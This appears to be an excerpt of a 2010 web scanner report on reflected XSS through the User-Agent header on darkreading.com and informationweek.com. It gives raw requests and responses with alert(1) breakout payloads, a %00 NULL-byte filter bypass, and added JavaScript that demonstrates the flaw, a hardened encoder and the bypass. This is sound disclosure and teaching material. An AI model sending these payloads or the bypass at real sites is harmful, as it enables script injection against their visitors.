Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/privacy HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6ca8b"-alert(1)-"2494c33683d
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7b5"-alert(1)-"5ea3fafdcf7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/security-management HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3c7b5"-alert(1)-"5ea3fafdcf7
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload 5986d"-alert(1)-"1354046a507 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/storage-security HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5986d"-alert(1)-"1354046a507
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Storage S ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload 4eee3"-alert(1)-"c6ea8b29333 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/vulnerabilities HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4eee3"-alert(1)-"c6ea8b29333
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload 38f54"-alert(1)-"f3899e95154 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud-computing/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f54"-alert(1)-"f3899e95154
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 66407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f54"-alert(1)-"f3899e95154"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
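The s.prop8 assignment in the response above is the vulnerable pattern behind every finding in this group: the raw header value is concatenated into a double-quoted string literal inside the page's analytics script. The following is an added example, not code from the report or from the sites it covers. It rebuilds that pattern in Node.js, places a hardened renderer beside it, and evaluates both with the report's own payloads through a stub alert(). The IP address, the function names, the encoder and the evaluation harness are constructed for illustration; JSON.stringify and new Function are standard JavaScript.

```javascript
// Added example; not code from the scan report or from the sites it covers.
// Rebuilds the report's vulnerable pattern (a raw User-Agent dropped into the
// double-quoted string literal of the s.prop8 assignment) beside a hardened
// renderer, and evaluates both with the report's payloads. The IP address,
// function names and the evaluation harness are constructed for illustration.

// Vulnerable rendering: plain concatenation into a hand-written string literal.
function renderVulnerable(ip, userAgent) {
  return 's.prop8="' + ip + ' | ' + userAgent + '";';
}

// Encodes a value as a JavaScript string literal that is safe to embed inside a
// <script> block. JSON.stringify escapes the quotes, backslashes and control
// characters that could close the literal; the extra replacements cover what it
// leaves alone: "</" (so a "</script>" in the data cannot end the enclosing
// script element) and the two Unicode line separators that engines predating
// ES2019 reject inside string literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened rendering: the literal comes from the encoder, never from
// concatenation, so the data cannot change the structure of the statement.
function renderSafe(ip, userAgent) {
  return 's.prop8=' + jsStringLiteral(ip + ' | ' + userAgent) + ';';
}

// Evaluation harness (not a sandbox): runs a rendered statement with a stub
// alert() and reports whether the injected call fired and what s.prop8 holds.
function execute(statement) {
  const s = {};
  let alertFired = false;
  const alert = () => { alertFired = true; };
  let error = null;
  try {
    new Function('s', 'alert', statement)(s, alert);
  } catch (e) {
    error = e.message;
  }
  return { alertFired, prop8: s.prop8, error };
}

// True if the HTML parser would end the enclosing <script> element inside the
// statement, whatever the JavaScript parser would make of it.
function containsScriptTerminator(statement) {
  return /<\/script/i.test(statement);
}

const IP = '203.0.113.10'; // constructed
const QUOTE_PAYLOAD = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f54"-alert(1)-"f3899e95154';
const SCRIPT_PAYLOAD = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6dd6f</script><script>alert(1)</script>878a9cc9ad4';

function demo() {
  return {
    vulnerable: execute(renderVulnerable(IP, QUOTE_PAYLOAD)),
    hardened: execute(renderSafe(IP, QUOTE_PAYLOAD)),
    vulnerableEndsScript: containsScriptTerminator(renderVulnerable(IP, SCRIPT_PAYLOAD)),
    hardenedEndsScript: containsScriptTerminator(renderSafe(IP, SCRIPT_PAYLOAD)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

With the vulnerable renderer the quote payload turns the assignment into `"..." - alert(1) - "..."`, so the stub alert fires and s.prop8 ends up as NaN; with the hardened renderer alert never runs and s.prop8 holds the full header value, quotes included. The second payload shows why string-level escaping alone is not enough: the HTML parser ends a script element at `</script` regardless of JavaScript syntax, which is why the encoder also rewrites `</`.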
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload %006dd6f</script><script>alert(1)</script>878a9cc9ad4 was submitted in the User-Agent HTTP header and was echoed as 6dd6f</script><script>alert(1)</script>878a9cc9ad4 in the application's response. The payload does not need to break out of the string literal: the browser's HTML parser ends the enclosing script element at </script> regardless of JavaScript syntax, and the following <script> element carries the injected call.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application (or a filter in front of it) attempts to block certain characters that are often used in XSS attacks, but the block can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the blocked characters.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where a NULL byte terminates a string: the filter inspects only the bytes before the NULL, while the application, which handles the value by length, receives and echoes everything after it. Fix the actual vulnerability within the application code and, if appropriate, ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%006dd6f</script><script>alert(1)</script>878a9cc9ad4
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:41 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:41 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%006dd6f</script><script>alert(1)</script>878a9cc9ad4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
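The remediation note above attributes the bypass to NUL-terminated string handling in native filtering code. The following is an added example, not code from the report or from any WAF vendor, that models that failure mode in JavaScript so the mechanism can be run end to end: a filter that sees only the bytes before the NUL, a length-aware filter that sees the whole buffer, and the application's echo behind them. The signature list, the URL-decoding of the header value before filtering and all function names are assumptions made for the model; the payloads are the report's.

```javascript
// Added example; not code from the report or from any WAF vendor. Models the
// failure mode behind the %00 bypass: a native-code filter treats a NUL byte as
// the end of the string and inspects only what precedes it, while the
// application copies the header value by length and echoes everything after
// the NUL. The blocklist, the URL-decoding step and the function names are
// assumptions for the model; the payloads are the report's.

// URL-decodes %XX sequences so that "%00" becomes a real NUL character, as a
// front end that decodes header values before filtering would (assumed).
function percentDecode(value) {
  return value.replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// What a C routine such as strstr() or strcasestr() sees when handed the
// buffer: everything from the first NUL onwards is invisible to it.
function cStringView(value) {
  const nul = value.indexOf('\0');
  return nul === -1 ? value : value.slice(0, nul);
}

// Assumed signature list for the model; real rule sets are far larger.
const BLOCKED_SIGNATURES = ['<script', '</script', 'alert(', '"-'];

function matchesSignature(view) {
  const lower = view.toLowerCase();
  return BLOCKED_SIGNATURES.some(sig => lower.includes(sig));
}

// Native-code filter: matches against the NUL-terminated view of the header.
function nulTerminatedFilterBlocks(headerValue) {
  return matchesSignature(cStringView(headerValue));
}

// Length-aware filter: the whole buffer is inspected, NUL or not. This is the
// behaviour to ask the vendor for, and what the application itself must assume.
function lengthAwareFilterBlocks(headerValue) {
  return matchesSignature(headerValue);
}

// The application's echo, as in the report's vulnerable s.prop8 assignment; the
// NUL itself is dropped, matching the report's "echoed as ..." wording.
function echoIntoScript(headerValue) {
  return 's.prop8="' + headerValue.replace(/\0/g, '') + '";';
}

// Runs a raw header value through both filters and, if the native one lets it
// pass, through the application's echo.
function assess(rawHeader) {
  const decoded = percentDecode(rawHeader);
  const nativeBlocked = nulTerminatedFilterBlocks(decoded);
  return {
    nativeBlocked,
    lengthAwareBlocked: lengthAwareFilterBlocks(decoded),
    echoed: nativeBlocked ? null : echoIntoScript(decoded),
  };
}

const UA = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)';
const WITHOUT_NUL = UA + '6dd6f</script><script>alert(1)</script>878a9cc9ad4';
const WITH_NUL = UA + '%006dd6f</script><script>alert(1)</script>878a9cc9ad4';

console.log(assess(WITHOUT_NUL)); // nativeBlocked: true, nothing echoed
console.log(assess(WITH_NUL));    // nativeBlocked: false, payload reaches the page
```

Without the NUL the signature match fires and the request is dropped; with `%00` in front of the payload the NUL-terminated view is just the benign Mozilla prefix, the filter passes the request, and the application echoes the full `</script><script>alert(1)</script>` sequence into the page. The length-aware filter catches both, which is the point of the remediation advice: the fix belongs in the application's own output encoding, with the WAF behaviour as a secondary concern.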
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload %00cc07e"-alert(1)-"667596fca51 was submitted in the User-Agent HTTP header and was echoed as cc07e"-alert(1)-"667596fca51 in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application (or a filter in front of it) attempts to block certain characters that are often used in XSS attacks, but the block can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the blocked characters.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /global-cio/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00cc07e"-alert(1)-"667596fca51
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:21 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:21 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 67906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00cc07e"-alert(1)-"667596fca51"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload 12a6c"-alert(1)-"1f25c426468 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/galleries/smb/ebusiness/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)12a6c"-alert(1)-"1f25c426468
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30504
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)12a6c"-alert(1)-"1f25c426468"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload 944e6"-alert(1)-"71356dc46bb was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/global-cio/interviews/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)944e6"-alert(1)-"71356dc46bb
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:35 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:35 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30799
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)944e6"-alert(1)-"71356dc46bb"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload 89605"-alert(1)-"deebaea4c96 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/government/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)89605"-alert(1)-"deebaea4c96
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30649
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)89605"-alert(1)-"deebaea4c96"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload ffef4"-alert(1)-"265893c47d4 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/data_protection/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ffef4"-alert(1)-"265893c47d4
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:34 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:34 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 29995
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ffef4"-alert(1)-"265893c47d4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
